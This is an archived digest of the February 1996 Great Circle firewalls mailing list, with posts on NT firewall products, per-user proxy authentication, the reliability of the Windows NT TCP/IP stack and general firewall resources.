Received: from guardian.colonial.com.au (guardian.colonial.com.au [140.168.249.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA08250 for ; Tue, 6 Feb 1996 14:57:31 -0800 (PST)
From: pmoen@sbnsw.com.au
Received: by guardian.colonial.com.au; id JAA17789; Wed, 7 Feb 1996 09:56:36 +1100
Received: from norman.cmutual.com.au(140.168.8.9) by guardian.colonial.com.au via smap (g3.0.1) id sma017783; Wed, 7 Feb 96 09:56:10 +1100
Received: from redbaron.cmutual.com.au ([140.168.1.5]) by norman.cmutual.com.au (post.office MTA v1.9.1 **** trial license expired ****) with SMTP id AAA29797 for ; Wed, 7 Feb 1996 09:57:33 +1100
Received: from mailgw.sbnsw.com.au by redbaron.cmutual.com.au with SMTP id AA19842 (5.65c/IDA-1.5 for ); Wed, 7 Feb 1996 09:57:27 +1100
Received: by mailgw.sbnsw.com.au; Wed, 7 Feb 96 10:00:58 +1000
Date: Wed, 7 Feb 96 10:00:56 SYD
Message-Id:
X-Priority: 3 (Normal)
To:
Subject: Info needed
X-Incognito-Sn: 606
X-Incognito-Format: VERSION=2.01a ENCRYPTED=NO
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

I'm after some information on the following products:

IBM NetSP Firewall (Secure Network Gateway)
Microsoft NT Firewall

I'm really after articles etc. that have been archived etc. and discussions from this group so refs to archives would be great if it is possible.
any other info would also be greatly appreciated

thanx in advance

later
Paul

From firewalls-owner Tue Feb 6 16:08:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA11819 for firewalls-outgoing; Tue, 6 Feb 1996 16:06:10 -0800 (PST)
Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA11789 for ; Tue, 6 Feb 1996 16:05:24 -0800 (PST)
Received: from cnw06.UUCP (root@localhost) by yarrina.connect.com.au with UUCP id LAA01840 (8.6.12/IDA-1.6 for firewalls@GreatCircle.COM); Wed, 7 Feb 1996 11:04:14 +1100
Received: from mecx05.colesmyer.com.au (mecx05.colesmyer.com.au) by coles.com.au (4.1/SMI-4.1) id AA15094; Wed, 7 Feb 96 10:56:01 EST
Received: from meei91 (meei97) by mecx05.colesmyer.com.au (5.0/SMI-4.1) id AA19830; Wed, 7 Feb 1996 10:41:35 +1100
Message-Id: <3117F7B3.3647@mecx05.colesmyer.com.au>
Date: Wed, 07 Feb 1996 10:52:03 +1000
From: Graham Jose
Organization: Coles Myer Limited
X-Mailer: Mozilla 2.0b6a (WinNT; I)
Mime-Version: 1.0
To: "firewalls@GreatCircle.COM"
Subject: User level firewall / proxy authentication
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Are there any firewall or proxy server products available that will allow outgoing user authentication based upon a user id, rather than an IP address?

Our users are mobile and this makes it difficult to restrict internet access on a per user basis, since their source IP address is likely to change.
Thanks,
Graham

--
Graham Jose, Technical Analyst, Information Systems Security
Retail Technology Services, Coles Myer Limited (Australia)
Voice: +613 9483 7613   Email: gjose@mecx05.colesmyer.com.au

From firewalls-owner Tue Feb 6 16:57:56 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA14357 for firewalls-outgoing; Tue, 6 Feb 1996 16:43:57 -0800 (PST)
Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA14261 for ; Tue, 6 Feb 1996 16:42:29 -0800 (PST)
Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id SAA10173; Tue, 6 Feb 1996 18:41:37 -0600 (CST)
Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id SAA04240; Tue, 6 Feb 1996 18:41:36 -0600
Posted-Date: Tue, 6 Feb 1996 18:41:36 -0600
Date: Tue, 6 Feb 1996 18:41:35 -0600 (CST)
From: Ron DuFresne
To: Graham Jose
cc: "firewalls@GreatCircle.COM"
Subject: Re: User level firewall / proxy authentication
In-Reply-To: <3117F7B3.3647@mecx05.colesmyer.com.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 7 Feb 1996, Graham Jose wrote:

> Are there any firewall or proxy server products available that will allow
> outgoing user authentication based upon a user id, rather than an IP address?
>
> Our users are mobile and this makes it difficult to restrict internet access on a
> per user basis, since their source IP address is likely to change.
>

This sounds pretty unsafe! How do you prevent me from spoofing one of your users?

Later,

Ron Dufresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation."
-- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Tue Feb 6 17:24:31 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA15628 for firewalls-outgoing; Tue, 6 Feb 1996 17:07:20 -0800 (PST)
Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA15623 for ; Tue, 6 Feb 1996 17:07:14 -0800 (PST)
Received: by garrison.com. (4.1/Nutered Mailer) id AA02437; Tue, 6 Feb 96 19:03:59 CST
Date: Tue, 6 Feb 96 19:03:59 CST
From: jeromie@garrison.com (Jeromie Jackson)
Message-Id: <9602070103.AA02437@garrison.com.>
To: firewalls@greatcircle.com
Subject: NT's TCP/IP stack
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

As we have all seen in the last few weeks, there have been several people who have been ragging on the Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find.

NT appears to have some good qualities, ease-of-use, although I am unsure about several things.

The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at.

The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.

I would be very interested in hearing about these issues.
Jeromie Jackson
Director of Technology
Garrison Associates
jeromie@garrison.com

From firewalls-owner Tue Feb 6 17:46:16 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA16866 for firewalls-outgoing; Tue, 6 Feb 1996 17:37:45 -0800 (PST)
Received: from ocean.st.usm.edu (ocean.st.usm.edu [131.95.110.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA16861 for ; Tue, 6 Feb 1996 17:37:40 -0800 (PST)
Received: (from rafuster@localhost) by ocean.st.usm.edu (8.6.12/8.6.9) id TAA20459 for firewalls@GreatCircle.COM; Tue, 6 Feb 1996 19:38:42 -0600
Message-Id: <199602070138.TAA20459@ocean.st.usm.edu>
Subject: hello
To: firewalls@GreatCircle.COM
Date: Tue, 6 Feb 1996 19:38:41 -0600 (CST)
From: "Raul Arturo Fuster"
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello everyone. I don't know if you got my last msg. I am doing this as a class assignment and I would like to know a little bit more about this mailing list. I have the notion that this is about Net security. If it is what kind of security is it about. Just let me know a little more.

Later.
--
Raul A. Fuster
rafuster@ocean.st.usm.edu
rafuster@whale.st.usm.edu
http://ocean.st.usm.edu/~rafuster (under construction)
Tel.
(601)266-1196

"CARPE DIEM"

From firewalls-owner Tue Feb 6 19:53:29 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA21471 for firewalls-outgoing; Tue, 6 Feb 1996 19:51:51 -0800 (PST)
Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA21466 for ; Tue, 6 Feb 1996 19:51:47 -0800 (PST)
Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id WAA11254; Tue, 6 Feb 1996 22:48:16 -0500
Date: Tue, 6 Feb 1996 22:48:12 -0500 (EST)
From: Rabid Wombat
To: Raul Arturo Fuster
cc: firewalls@greatcircle.com
Subject: More Firewalls info (was hello:)
In-Reply-To: <199602070138.TAA20459@ocean.st.usm.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This mailing list is primarily devoted to the discussion of firewalls, devices which restrict access between two (or more) networks, (often between a private network and Internet).

For more information, see:

The archives of this mailing list:
http://www.greatcircle.com/firewalls/archive/

The firewalls FAQ @ Ohio State:
http://www.cis.ohio-state.edu/hypertext/faq/usenet/firewalls-faq/faq.html

A good collection of links:
http://www.willamette.edu/~dlabar/firewall.html

or read

Chapman and Zwicky
Building Internet Firewalls
http://www.greatcircle.com/firewalls-book/

Cheswick and Bellovin
Firewalls and Internet Security - Repelling the Wily Hacker
http://www.aw.com/cp/Ches.html

----------------------------------------
Rabid Wombat
wombat@mcfeely.bsfs.org
----------------------------------------

On Tue, 6 Feb 1996, Raul Arturo Fuster wrote:

> Hello everyone. I don't know if you got my last msg.
> I am doing this as a class assignment and I would like
> to know a little bit more about this mailing list.
> I have the notion that this is about Net security.
> If it is what kind of security is it about.
> Just let me know a little more.
> Later.
> --
> Raul A. Fuster
> rafuster@ocean.st.usm.edu
> rafuster@whale.st.usm.edu
> http://ocean.st.usm.edu/~rafuster (under construction)
> Tel. (601)266-1196
>
> "CARPE DIEM"
>

From firewalls-owner Tue Feb 6 22:08:51 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA25562 for firewalls-outgoing; Tue, 6 Feb 1996 21:57:26 -0800 (PST)
Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA25548 for ; Tue, 6 Feb 1996 21:57:19 -0800 (PST)
Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA252; Wed, 7 Feb 1996 00:56:25 -0500
Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca>; Wed, 7 Feb 1996 00:55:01 -0500
Message-ID: <01BAF4F6.E8D957C0@rwcooper.RC.Toronto.on.ca>
From: Russ
To: "'Jeromie Jackson'"
Cc: "'Firewalls'"
Subject: RE: NT's TCP/IP stack
Date: Wed, 7 Feb 1996 00:54:59 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

You should probably be more specific in your request for information. For example, would you like me to list the bugs in the TCP/IP stack for;

v3.5 no Service Packs (SP)
v3.5 SP1
v3.5 SP2
v3.5 SP3 (C2 compliant without networking)
v3.51 no SP
v3.51 SP1
v3.51 SP2
v3.51 SP3
v3.51 SP3 with SRV.SYS Hot Fix
or v3.51 SP4 (due out in the next 10 days)
or v4.0 (due out in the next few months)

Considering that these releases were all made in the last 18 months, it's quite conceivable that you could encounter one, or all, of these environments. This, I think, might be the biggest problem here. This list only outlines the Microsoft releases; in addition to these, you have all the releases of driver software from the various NIC vendors to deal with.
Add Systems Management Server (which has a network monitor component that adds to the stack functionality and exploits embedded RMON in NT Servers it connects to), various server products which add performance meters for various IP related tasks (Web servers that track number of hits on HTTP, for example). Then couple that with numerous registry entries which can be manipulated by the Administrator for various performance gains (or losses, depending on the Admin ;-]).

Oh, and by the way, you could be talking about a network interface entity that includes not only IP, but NetBeui, IPX, AppleTalk, DLC (hmmm, I feel like I'm missing a protocol here)...

It's extremely difficult to talk about a "generic" IP stack for Windows NT, which may explain the lack of interest or insight into its secure nature. For now, sites pretty well have to be taken on a case by case basis with certain "generic" principles being applied initially, and then some real work and imagination.

For these reasons alone, I can see why "secure" types (what name did we end up with again? -- no, please don't remind me) have issues with its wide-spread use in secure environments.

Of course, there is also the issue that whenever MS releases a Service Pack, they give you a nice list of all the bugs they fixed. What they don't tell you is that they don't always list all of the fixed items. They also don't tell you (how could they) all the things they broke while fixing things. The end result is, you would have to go back and apply your tests to see if your security is still intact.

[Firewall relevance]
To some extent, there may be some relief to all of this on the horizon. With the introduction of Raptor and soon Network-1 into the Windows NT realm of Firewalls, there are seriously security conscious individuals who will have to track these changes to see if they affect their product. Hopefully this will lead to increased scrutiny of the product from a specifically secure standpoint.
[Shameless plug]
Of course, with the just announced strategic partnership between MCI and Microsoft (and of course, SHL), and the fact that MCI will be hosting MSN on the Internet, we will hopefully see lots more NT boxes on the Internet, again, forcing people to look more closely at the viability of securing NT boxes.

There's definitely something wrong with someone like me who lives for these types of questions, I guess I just love the controversy! ;-]

Cheers,
Russ

Russ Cooper - Senior Consultant - Internet
SHL/Computer Innovations - Consulting Services
"Do you have the vision to see my future as I projected it?"

From firewalls-owner Wed Feb 7 03:38:39 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA04652 for firewalls-outgoing; Wed, 7 Feb 1996 03:27:54 -0800 (PST)
Received: from uu9.psi.com (uu9.psi.com [38.145.107.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA04647 for ; Wed, 7 Feb 1996 03:27:50 -0800 (PST)
Received: from infosys.inf.COM by uu9.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; id AA06746 for firewalls@greatcircle.com; Wed, 7 Feb 96 06:26:43 -0500
Received: by Inf.COM (4.1/SMI-4.1) id AA24690; Wed, 7 Feb 96 06:24:04 EST
Received: from unknown(204.4.59.106) by infosys.inf.COM via smap (V1.3) id sma024622; Wed Feb 7 06:23:30 1996
Received: from cc:Mail by smtp_gw.inf.com id AA823691133; 07 Feb 95 12:20:06 EST
Date: 07 Feb 95 12:20:06 EST
From: "SATEESHB"
Message-Id: <9601078236.AA823691133@smtp_gw.inf.com>
To: firewalls@greatcircle.com, jeromie@garrison.com (Jeromie Jackson), winnt-l@eva.dc.lsoft.com
Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict.
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Well, I don't know how relevant the reply is to your needs. I faced problems with NetManage Chameleon version 5.0. It starts a program called NEWT (NetManage Enhanced Windows TCP/IP).
When I try to run one of my programs which is a service from the service control panel, it hangs. Even that cute messagebox "Attempting to start Service" with the small clock also doesn't come up. After wasting many hours and losing sleep, I found out that if I rename NEWT.exe to some other name so it would fail to get loaded automatically, the SCM behaves properly. I feel NEWT tcp/ip might be conflicting with NT TCP/IP. Why the NetManage guys should have a different program for this when NT provides one is beyond my comprehension.

It would be of help to me if someone can tell me how the Service Control Manager is related to TCP/IP here. (Is it something to do with the RPC stuff they talk about for starting services remotely? In my case I started locally.)

Any discussion on the NT TCP/IP stack will be greatly appreciated.

Regards,
Sateesh Babu N S, Systems Analyst, Infosys Technologies Ltd, Bangalore India.

______________________________ Reply Separator _________________________________
Subject: NT's TCP/IP stack
Author: jeromie@garrison.com (Jeromie Jackson) at SMTP_GW
Date: 2/6/96 7:03 PM

As we have all seen in the last few weeks, there have been several people who have been ragging on the Windows NT TCP/IP stack. I would like to hear some comments on real problems that have been detected. I have looked around the net, although no hard-fact information could I find.

NT appears to have some good qualities, ease-of-use, although I am unsure about several things. The integrity of the OS. Nobody can test it well. Who's to say what holes are under the hood that nobody has a good chance to look at. The TCP/IP stack has been said to have problems. They are not a security company, therefore I am very unwilling to assume they have done the proper testing for security purposes. For that matter, I am unwilling to assume the product isn't full of "Microsoft Features" that are undocumented.

I would be very interested in hearing about these issues.
Jeromie Jackson
Director of Technology
Garrison Associates
jeromie@garrison.com

From firewalls-owner Wed Feb 7 06:09:00 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA08886 for firewalls-outgoing; Wed, 7 Feb 1996 06:07:08 -0800 (PST)
Received: from server. ([198.199.198.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA08881 for ; Wed, 7 Feb 1996 06:07:04 -0800 (PST)
Received: from DMT.fc.com ([198.199.198.164]) by server. (8.6.12/8.6.12) with SMTP id KAA02865 for ; Wed, 7 Feb 1996 10:39:03 -0500
Message-ID: <3118B1D7.7C54@fc.com>
Date: Wed, 07 Feb 1996 09:06:15 -0500
From: "Douglas M. Todd, Jr."
Organization: fc.com
X-Mailer: Mozilla 2.0GoldB1 (Win95; I)
MIME-Version: 1.0
To: firewalls@GreatCircle.COM
Subject: NT Firewalls/Web Servers
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anyone know of any good NT Firewalls and Web Servers?

==DMT>
--
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>Douglas M. Todd, Jr. fc.com, Inc.
One Federal Street BLD 102
Springfield, MA 01105
PHN: 413-733-7333 FAX: 413-733-7725
Email: Doug@fc.com or Bunyan@msn.com

From firewalls-owner Wed Feb 7 06:54:00 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA09757 for firewalls-outgoing; Wed, 7 Feb 1996 06:44:53 -0800 (PST)
Received: from protosoft.com ([204.128.207.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA09744 for ; Wed, 7 Feb 1996 06:44:48 -0800 (PST)
Received: by protosoft.com (4.1/SMI-4.1) id AA14974; Wed, 7 Feb 96 08:42:45 CST
Date: Wed, 7 Feb 1996 08:42:45 -0600 (CST)
From: Mohammed Ali
To: Matts Kallioniemi
Cc: Sick Puppy , firewalls@GreatCircle.COM
Subject: Re: Need a few pointers
In-Reply-To: <199602061550.QAA17949@mail.pi.se>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 6 Feb 1996, Matts Kallioniemi wrote:
> At 17.41 1996-02-05 -0500, Sick Puppy wrote:
> >There was a very good response to my query. I had no idea there were
> >so many security problems and performance problems associated with
> >WindBlows 95. Sounds like the operating system was written by a couple
> >of drunken cats. In a couple of days I will get the responses together
> >in one file, together with a couple of good web pointers, and pass it on
> >to anyone who wants an e-mailed copy.
>
> I want one, please! Why don't you post it to the list?

I also want a copy, please mail it to the list.

Mohammed Ali.
From firewalls-owner Wed Feb 7 07:38:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA10595 for firewalls-outgoing; Wed, 7 Feb 1996 07:12:01 -0800 (PST)
Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA10590 for ; Wed, 7 Feb 1996 07:11:56 -0800 (PST)
Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id JAA23576 for ; Wed, 7 Feb 1996 09:11:22 -0600 (CST)
Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.7.2/8.7.2) with SMTP id JAA23572 for ; Wed, 7 Feb 1996 09:11:21 -0600 (CST)
Received: from zuhn.sctc.com (zuhn.sctc.com [172.17.1.134]) by spirit.sctc.com (8.6.12/8.6.9) with SMTP id JAA10390; Wed, 7 Feb 1996 09:11:52 -0600
Message-Id: <199602071511.JAA10390@spirit.sctc.com>
Date: Wed, 07 Feb 1996 09:11:48 -0600
From: zuhn@sctc.com (david d `zoo' zuhn)
To: firewalls@greatcircle.com
Subject: Re: User level firewall / proxy authentication
References: <3117F7B3.3647@mecx05.colesmyer.com.au>
Organization: Secure Computing Corporation; Roseville, MN
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

// > Are there any firewall or proxy server products available that will allow
// > outgoing user authentication based upon a user id, rather than an IP
// > address?
// >
// > Our users are mobile and this makes it difficult to restrict internet
// > access on a per user basis, since their source IP address is likely to
// > change.
//
// This sounds pretty unsafe! How do you prevent me from spoofing one of
// your users?

Yes, there are several firewall systems that handle authentication on a per-user basis. All that I know of will also allow permission acl's that include host address ranges as well.
This can be useful when dealing with a range of dynamic addresses (such as allocated by DHCP or similar protocols), requiring userid based authentication for those addresses, and relying on host-based permissions for the static addresses on the network.

As for the safety, there are usually a variety of means available for user authentication. Those I have seen in the market range from insecure username & reusable passwords (a la Unix passwords) to software based challenge-response systems (LOCKout or S/Key) to hardware based token cards of some form or another (SecurID, SNK). A common tradeoff in authentication systems is price vs. unspoofability.

For many sites, outbound authentication is used more for accounting chargeback schemes than for any more stringent authorization, so a reusable password system isn't unreasonable. But I'd never trust inbound authentication to anything that doesn't use some form of cryptographically secure algorithm.

--
david d `zoo' zuhn --- secure computing corporation
zuhn@sctc.com

From firewalls-owner Wed Feb 7 07:53:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA10951 for firewalls-outgoing; Wed, 7 Feb 1996 07:27:19 -0800 (PST)
Received: from gatekeeper.vitro.com (gatekeeper.vitro.com [149.32.254.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA10944 for ; Wed, 7 Feb 1996 07:27:10 -0800 (PST)
From: don_tompkins@esd.tracor.com
Received: by gatekeeper.vitro.com (5.65/DEC-Ultrix/4.3) id AA12018; Wed, 7 Feb 1996 10:25:45 -0500
Received: from esd.vitro.com(131.189.79.30) by gatekeeper.vitro.com via smap (V1.3) id sma012004; Wed Feb 7 10:25:37 1996
Received: from ccMail by esd.tracor.com (IMA Internet Exchange 1.04b) id 118c4360; Wed, 7 Feb 96 10:24:38 -0500
Mime-Version: 1.0
Date: Wed, 7 Feb 1996 08:38:44 -0500
Message-Id: <118c4360@esd.tracor.com>
Subject: Most Secure Unix?
To: giff@congress.east.sun.com (Wayne Gifford - Internet Commerce Group), Firewalls@GreatCircle.COM
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Description: cc:Mail note part
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What about HP-UX BLS. Other B level efforts are also underway... Concur administration is important.

From firewalls-owner Wed Feb 7 08:09:53 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA11413 for firewalls-outgoing; Wed, 7 Feb 1996 07:46:47 -0800 (PST)
Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA11407 for ; Wed, 7 Feb 1996 07:46:39 -0800 (PST)
Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 10:46:18 -0500
Message-ID: <80C818310136C8D1@usia.gov>
Date: Wed, 7 Feb 96 10:42:40 -0500
From: "Lehrer, Neil"
Organization: USIA
To: firewalls@greatcircle.com
Subject: firewalls, email, and dns
X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

hi, our smtp mail server is an smtp/mhs gateway that runs on DOS. since it does not have the traditional sendmail vulnerabilities can I/should I allow smtp traffic through a firewall to it rather than having a mail forwarder outside the firewall receive the mail and send it to the gateway? yes/no? and if yes, are there any other considerations, for example, how should i set up the internal and external dns's? cc to my email would be great. thanks.

Regards
+++++++++++++++++++++++++++++++++++++++
+ Neil Lehrer
+ U.S. Information Agency
+ Networks and Systems Support Division
+
+ voice 202 619-0903
+ fax 202 619-3883
+ internet nlehrer@usia.gov
+
+ "oh what a tangled net we weave
+ when we seek to retrieve."
+
+++++++++++++++++++++++++++++++++++++++

From firewalls-owner Wed Feb 7 08:40:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12742 for firewalls-outgoing; Wed, 7 Feb 1996 08:18:11 -0800 (PST)
Received: from netsurfer.pixi.com (netsurfer.pixi.com [140.174.243.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12737 for ; Wed, 7 Feb 1996 08:18:06 -0800 (PST)
Received: from netsurfer by netsurfer.pixi.com ; 7 FEB 96 06:12:59
Date: Wed, 7 Feb 1996 06:12:58 -1000 (HST)
From: NetSurfer
X-Sender: netsurf@netsurfer
To: SATEESHB
Cc: firewalls@greatcircle.com, Jeromie Jackson , winnt-l@eva.dc.lsoft.com
Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict.
In-Reply-To: <9601078236.AA823691133@smtp_gw.inf.com>
Message-ID:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Are you running the Windows Chameleon or the NT Chameleon?

On -1 xxx -1, SATEESHB wrote:
> I faced problems with NetManage Chameleon version 5.0 .It starts a
> program called NEWT(NetManage Enhanced Windows Tcp/IP).
8< snip 8< snip

#include
[ASCII-art signature banner]

From firewalls-owner Wed Feb 7 08:53:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12226 for firewalls-outgoing; Wed, 7 Feb 1996 08:07:19 -0800 (PST)
Received: from Disclosure.COM (di2.disclosure.com [205.156.194.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12221 for ; Wed, 7 Feb 1996 08:07:13 -0800 (PST)
Received: by Disclosure.COM (4.1/SMI-4.1) id AA19254; Wed, 7 Feb 96 11:09:47 EST
Date: Wed, 7 Feb 1996 11:09:46 -0500 (EST)
From: Scott Barman
To: Wayne Gifford - Internet Commerce Group
Cc: Firewalls@GreatCircle.COM
Subject: Re: Most Secure Unix?
In-Reply-To: <199601292147.QAA06214@traveller.East.Sun.COM>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 29 Jan 1996, Wayne Gifford - Internet Commerce Group wrote:
>
> There are no secure UNIXes, only security conscious administrators

Geez... we're back on this again? How about:

There are no secure OPERATING SYSTEMS, only security conscious administrators/sysops/people who give a darn.

Is that OK and politically correct? I sure hope so!

scott barman
--
scott barman          DISCLAIMER: I speak to anyone who will listen,
scott@disclosure.com              and I speak only for myself.
barman@ix.netcom.com
"Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming."
- scott barman

From firewalls-owner Wed Feb 7 08:55:11 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA12760 for firewalls-outgoing; Wed, 7 Feb 1996 08:18:23 -0800 (PST)
Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA12746 for ; Wed, 7 Feb 1996 08:18:16 -0800 (PST)
Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id LAA26781 for ; Wed, 7 Feb 1996 11:17:27 -0500
Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA29082; Wed, 7 Feb 96 11:08:26 -0600
Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA10205; Wed, 7 Feb 96 11:05:02 -0500
Date: Wed, 7 Feb 96 11:05:02 -0500
Message-Id: <9602071605.AA10205@hfsi>
From: "KM"
Reply-To: "KM"
To: firewalls@GreatCircle.COM
Subject: Re: Survey
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In message <199602061540.KAA18136@Fe3.rust.net> "Kenneth J. Stephens" writes:
> If the magazine publishers forced the issue date onto all of their reprints
> the vendors would have little use for the reprints. The date stamp would
> obsolete
> the reprint so quickly that the vendor would look foolish for distributing
> old info. One of the hazards of a dynamic industry.

So what you're saying is that the publishers, in collusion with the vendors, are being dishonest by omission. Why doesn't this surprise me?

------------------------------------------------------
Karen Goertzel
Manager, International Programmes and Special Projects
Secure Systems and Services Operation
Wang Federal, Inc.
7900 Westpark Drive - MS 700
McLean, Virginia 22102-4299
TEL: 703-827 3914 FAX: 703-827 3161
goertzek@wangfed.com http://www.wangfed.com
+------------------------------+
| It infuriates me to be wrong |
| when I know I'm right.       |
|                  -- Moliere  |
+------------------------------+

From firewalls-owner Wed Feb 7 09:09:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA13097 for firewalls-outgoing; Wed, 7 Feb 1996 08:24:18 -0800 (PST)
Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA13087 for ; Wed, 7 Feb 1996 08:24:12 -0800 (PST)
Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 11:24:03 -0500
Message-ID: <88C818310136C8D1@usia.gov>
In-Reply-To: <0A1F09310136C8D1>
Date: Wed, 7 Feb 96 11:19:33 -0500
From: "Lehrer, Neil"
Organization: USIA
To: firewalls@greatcircle.com
Subject: ipx routing
X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

